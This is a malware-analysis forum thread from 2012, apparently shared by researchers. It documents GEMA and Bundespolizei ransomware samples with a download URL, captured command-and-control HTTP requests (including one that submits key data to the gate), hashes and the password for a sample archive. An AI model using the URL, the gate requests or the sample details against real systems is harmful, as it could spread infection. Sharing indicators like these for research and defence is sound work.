A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #11997  by Xylitol
 Tue Mar 06, 2012 1:01 pm
GEMA, served via BH EK, come from manualad.in/6.exe
Image

Gate on the same domain
Code: Select all
GET /fv79df.php?id=8065D52C494C59586441&cmd=img HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: manualad.in
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK

---

GET /fv79df.php?id=8065D52C494C59586441&cmd=geo HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: manualad.in
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Tue, 06 Mar 2012 12:42:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Length: 37
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html

..8..@../.'.{....\~.B..'...a.....X..6

---

GET /fv79df.php?id=8065D52C494C59586441&stat=0 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: manualad.in
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Tue, 06 Mar 2012 12:42:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Length: 4
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html

..>.

---

GET /fv79df.php?id=8065D52C494C59586441&cmd=key&data=2:0:MDEyMzQ1Njc4OTU3OTYwNQ== HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: manualad.in
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Tue, 06 Mar 2012 12:47:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Length: 4
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html

..>.
VT: 2/43 >> https://www.virustotal.com/file/53a33ad ... /analysis/

Additional:
Code: Select all
• dns: 1 » ip: 188.190.126.171 - adresse: MANUALAD.IN
http://manualad.in/cgi-bin/
http://manualad.in/icons/
http://manualad.in/config/
http://manualad.in/error/
http://manualad.in/phpmyadmin/
http://manualad.in/squirrelmail/
http://manualad.in/server-status/
Attachments
infected
(24.07 KiB) Downloaded 59 times
 #12148  by Striker
 Thu Mar 15, 2012 6:20 pm
Another ransom from a german warez site

Detection ratio: 5 / 43
MD5: 7db7bc92d6b9fc8d957dfa0dac29fcbe
VT: https://www.virustotal.com/file/f3e694a ... 331834189/

Bundespolizei Ransom:

Image

Code to unlock: 0111222233334444 or something like that (16 chars)
Attachments
pw = zoit
(23.09 KiB) Downloaded 64 times
  • 1
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12